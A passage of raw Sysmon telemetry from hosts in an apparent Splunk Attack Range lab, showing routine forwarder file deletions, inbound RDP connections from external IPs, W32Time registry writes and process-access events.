AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8A22EF88D46D76677D8A218A250E4E10,SHA256=B3D44DA89404D51D829737D3E6ECDA8A981F1AD99D931C85EFD19CE18C58ED19,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976686Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:06.404{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32572E34138EF89CDED73A214A2E9DF6,SHA256=78F435A7E549E574B72F34D48BC3047A8171C8E6EF5FD33E8BA7C88C7E1EB64D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048117Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:06.542{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=471E1E4365EF20E7430C18668DBF3D6D,SHA256=0B0A4B8405E3EECC951DC871EB9576E42971C827C7C478B4B6D2500991ACB42B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048119Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:07.542{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F67E9B08FB0F743BE965F9236C5679DF,SHA256=32BAE13B3A5205EC44F43FD78CDAA0CC425586C30E80215C1D026A2B49F6F493,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976690Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:07.419{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C649C84504103FFBDC3EBB4313177755,SHA256=412A219324F8C4FD214DC417B15AD007AAD4EC949BFDC554995CC23EDFDEF617,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976689Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:04.047{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-54861-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000976688Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:03.716{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-48835-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x80000000000000001048118Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:04.802{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49230-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001048120Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:08.578{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46B99ACCC4C997D7C863AA3C27D628C2,SHA256=10D58D4B1A7C6FA8F5B45DE6CAF6F558B794674770146082309E5A7385C72779,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976692Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:08.576{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=53D89EAB69D1D677673F39A1ABC39A86,SHA256=31CBB4F31AB1265B05A0DF6368709F0910E75FFAC08BB2EC924A59B4D9CDAD55,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976691Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:08.435{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=832D25A40380346662DD0D3C326EE4CC,SHA256=8B7EA43BA17FEB98445726531FD2EE6D3CC4CF90A81F496320545783BABE3F4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976694Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:09.451{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C22C00612D508CD3AB899317F8B29BE,SHA256=2572FAD880E3D16BB51FCC0FB5BE10DD4989D3A61C784BAD642A0C9B0D6C50E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048121Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:09.594{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AC44A32093F66B59E695A0D40ECB022,SHA256=313DFB536E0980DCEFCAAFCEA9005A38F015280D4C0288192D6C81D3C7705AE3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976693Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:04.720{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59266-false10.0.1.12-8000- 23542300x8000000000000000976697Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:10.669{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5EFBF0EDED16E3EB72065B63E520D399,SHA256=64802AD7C225334A97A0C1FE249A60E06C6927CD6A1D5D300E81EEBE8CCB821D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048124Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:10.812{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2BF023D62336D50F632D9CF15114C563,SHA256=267064738064379179AA4B5A604768E6FD24A4AB5AB7C5C651ECCDDBCFB757B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048123Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:10.812{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=61FBA51F1F2C26AAE30309BAB303C11D,SHA256=4F90EA2AD5F5D02ABD33F1C32CE91E1522371C912DBD0D24D8F315E26B77D49A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048122Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:10.596{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8B1CA52C8D1E0F5083D2CB45BC39BBA,SHA256=1D0B8101FEFC252BF2418116D2BE269ED4736A3C752FE488F52E1FD6C1B550E4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976696Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:06.769{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-63181-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000976695Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:05.579{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-1271-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976698Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:11.685{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1625BF222070226AFDA79C22286B241D,SHA256=7D6CEA64DD57220CC170C6790239A52BAB9E485279C1C730BE198734DDC3961D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048126Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:11.611{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2C18B2F4893A7D2BB8AD3FE145A321E,SHA256=0AB6827BF9966B021ED231355F3FB3AE35E91605EF3676CF290C93B76CA3D0EF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048125Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:08.962{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-63959-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x8000000000000000976700Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:12.904{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C415558D64D79A0D360CC225F3A7EFFE,SHA256=51A24F9FF8C4AB13BD70512141C5A7DE8DDF9A1DBC540C969C3469C9A39E4C2D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048127Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:12.629{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FAACA486608F5CF37EEC9FBEA8AB44F2,SHA256=DFF6B63E297ECAE7D097FEA6115081EADD1146C08FC229C60355D51ED550D3B5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976699Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:08.585{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-12363-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001048139Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:13.659{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9908CD5B36C79A429FAF1249EA4AEB16,SHA256=DCBA6DF7E6E6DE0DCB378EA01E8D3F812CE97420E1185AFA1FB88D4D5B866FAB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048138Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:10.766{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49231-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000976704Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:13.622{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3F3F6C61337D4E6CD6A707997B3225DA,SHA256=F93580F1B9E2FE925DBD95ABB3F4C210BFAA32E3C0EAD026170FB8FF5512B198,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976703Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:13.622{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=37998F3300A4FA2E0B1597CB33C64A66,SHA256=16EBDCA4224B5EBA3196D8446775AB3D1E1C7B98A46E2D056E53CAB7B5703C21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976702Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:13.466{69CF5F33-7F29-614D-1D00-00000000FD01}1960NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976701Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:09.876{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59267-false10.0.1.12-8000- 13241300x80000000000000001048137Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:02:13.559{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x80000000000000001048136Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:02:13.559{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0fc56a00) 13241300x80000000000000001048135Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:02:13.559{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7b375-0xfadb35d5) 13241300x80000000000000001048134Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:02:13.559{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7b37e-0x5c9f9dd5) 13241300x80000000000000001048133Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:02:13.559{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7b386-0xbe6405d5) 13241300x80000000000000001048132Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:02:13.559{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x80000000000000001048131Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:02:13.559{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0fc56a00) 13241300x80000000000000001048130Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:02:13.559{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7b375-0xfadb35d5) 13241300x80000000000000001048129Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:02:13.559{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7b37e-0x5c9f9dd5) 13241300x80000000000000001048128Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:02:13.559{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7b386-0xbe6405d5) 23542300x80000000000000001048142Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:14.844{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2BF023D62336D50F632D9CF15114C563,SHA256=267064738064379179AA4B5A604768E6FD24A4AB5AB7C5C651ECCDDBCFB757B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048141Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:14.660{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=350067C8B5197F7B4DB58C8F818E084B,SHA256=E2E0C6D43AA7497A5E802852308C8D083AE4EC51669871077AE4752CB0535F02,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976705Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:14.138{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E10121B8A7D5A58AA06045CACAD00161,SHA256=523BD0583F7E9F59DE26027944FF31B81536745A6657B75AA4A56ACCA0D44EEE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048140Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:12.629{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse119.167.194.165-62171-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001048144Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:15.713{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D27BC7FCAC362C14A4E3DFE7D3804718,SHA256=A28C7D99B71BC537E42E6A0ACEC8E783BF6CB322EF3481902C6168C2CB430902,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976707Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:15.372{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E52EF81831803EC4748549A82235DC03,SHA256=6EAE69D5DB417FB2FF547255F00A9977A62B4765EA8B8E398B4BCC29AFFACD09,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048143Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:13.203{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-61041-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x8000000000000000976706Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:12.095{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59268-false10.0.1.12-8089- 23542300x80000000000000001048151Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:16.963{5EBD8912-7F40-614D-2C00-00000000FC01}3028NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\respondent-20210924073323-4298MD5=3A908804D0573FF7380F514264884FB3,SHA256=C81D2F048F52EDBC4290754297EEBE81A82636336939823758E35E4C6AD1E005,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048150Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:16.780{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D709380DB3BAE19913152B50FFCB6D7F,SHA256=E6B12DAD1C1A53334FFBBF0995310C8C17965AB7F22F0DC43BF4ECB4C48F4F23,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976709Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:13.581{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-41938-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976708Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:16.388{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F63E4612A253094CF6DB814F5D7EBD4C,SHA256=80B42C3FDBC2F5FE3A1A6D64C65A2DE37E3DB4FE98B8A145543A9D4E4794F44A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048149Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:16.560{5EBD8912-79C0-6151-E577-00000000FC01}42962240C:\Windows\Explorer.EXE{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+55a10|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF801B4AE68A8)|UNKNOWN(FFFFAF68570A5B48)|UNKNOWN(FFFFAF68570A5CC7)|UNKNOWN(FFFFAF68570A0351)|UNKNOWN(FFFFAF68570A1D1A)|UNKNOWN(FFFFAF685709FFD6)|UNKNOWN(FFFFF801B47FE103)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5927b|C:\Windows\System32\SHELL32.dll+dac2a|C:\Windows\System32\SHCORE.dll+33fad 10341000x80000000000000001048148Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:16.560{5EBD8912-79C0-6151-E577-00000000FC01}42962240C:\Windows\Explorer.EXE{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+554f1|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF801B4AE68A8)|UNKNOWN(FFFFAF68570A5B48)|UNKNOWN(FFFFAF68570A5CC7)|UNKNOWN(FFFFAF68570A0351)|UNKNOWN(FFFFAF68570A1D1A)|UNKNOWN(FFFFAF685709FFD6)|UNKNOWN(FFFFF801B47FE103)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5927b|C:\Windows\System32\SHELL32.dll+dac2a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048147Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:16.560{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RFfc575b8.TMPMD5=DE3A0FA109221B18DF49AC1FFC6FE4B1,SHA256=ED397D4D656C29DB004817AED882B128D4456823F423CD84E3D3C39C431C5AC4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048146Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 